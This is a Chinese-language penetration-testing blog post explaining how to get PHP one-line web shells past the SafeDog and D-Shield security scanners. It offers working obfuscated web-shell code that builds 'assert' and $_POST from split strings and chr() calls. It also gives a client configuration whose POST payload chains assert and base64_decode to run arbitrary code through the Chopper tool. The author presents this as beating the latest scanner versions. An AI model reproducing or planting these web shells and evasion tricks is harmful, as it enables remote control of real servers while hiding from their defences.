?

Dec 06 2018

利用符號繞過安全狗/D盾

首頁 » 滲透測試 » 利用符號繞過安全狗/D盾   

授之以魚不如授之以漁
一句話最原始形態:
<?php eval($_POST[4]);?>
<?php assert($_POST[4]);?>
注意:
BaiDu下一eval和assert的區別
eval可以不變量引用,而assert可以;eval可以執行多條語句,assert只能執行一句

在D狗掃描Web后門的時候就會匹配這兩個函數
繞過方法:拆封-->組合
拆分:{}和$
組合:()和.

    $c='ass'.'ert';$c($_POST[4]);

復制代碼

//這個是經過簡單$拆分的一句話,但過不D盾
//過濾 變量+($_POST    想辦法改變這個模式

    $c='ass'.'ert';${c}($_POST[4]);

復制代碼

//這個就繞過D盾了,{}變量分離符,可以把$后面的變量名做字符串處理

    $_POST[4] == ${chr(95).'POS'.chr(84)}[4]

復制代碼

//可以測試一下,是一樣的可以接受到POST數據中4的參數

我的一句話:

    <?php

    $A='Acc';

    $p='_';

    $o='PO';

    $s='S';

    $t='T';

    $a='as';

    $b='sert';

    $Acc=$a.$b;

    ${$A}(${$p.$o.$s.$t}[4]);

說到底,只要想辦法拆封組合就可以繞過,所以沒必要擔心軟件更新

//在來說如何繞過安全狗連接一句話,如果沒搞明白eval和assert的區別最好在搞明白在看
這是剛寫的,過最新的狗
hatchet.ini:

    [Header]

    User-Agent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

    Referer=1

    X-Forwarded-For=1

    [/Header]

    [Headers]

    Accept-Language: en-us

    Content-Type: application/x-www-form-urlencoded

    [/Headers]

    [POST]

    ASP_POST_DATA==Execute("Ex"%26cHr(101)%26cHr(99)%26"ute(""On+Error+Resume+Next:

    [email protected]${chr(95).'POS'.chr(84)}[1]($_POST['xxxx'](ZXZhbCgkX1BPU1RbJ3h4eHgnXSgkX1BPU1RbJ3h4eCddKSk7));&1=assert&xxxx=base64_decode&xxx=

    [email protected]_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);

    [/POST]

這里只講PHP的



    [email protected]${chr(95).'POS'.chr(84)}[1]($_POST['xxxx'](ZXZhbCgkX1BPU1RbJ3h4eHgnXSgkX1BPU1RbJ3h4eCddKSk7));&1=assert&xxxx=base64_decode&xxx=

復制代碼

@${chr(95).'POS'.chr(84)}[1] == $_POST[1] == assert
//這個應該還理解

$_POST['xxxx'](ZXZhbCgkX1BPU1RbJ3h4eHgnXSgkX1BPU1RbJ3h4eCddKSk7)  
//這個我不講,大家可以解密base64編碼,為什么要"重復"
菜刀的操作(讀文件,寫文件,數據庫,命令執行)的php代碼都是大于1行的,而我們一句話用的assert,只能執行一句php代碼,所以必須重復再寫一個代碼執行eval函數
&1=assert&xxxx=base64_decode&xxx=
//這是POST的數據,不多講。



正文部分到此結束

文章標簽:這篇文章木有標簽

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «繞過WAF繼續SQL注入常用方法 | 上傳繞過WAF的tips大全»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

這篇文章還沒有收到評論,趕緊來搶沙發吧~

?
?
河北11选5开奖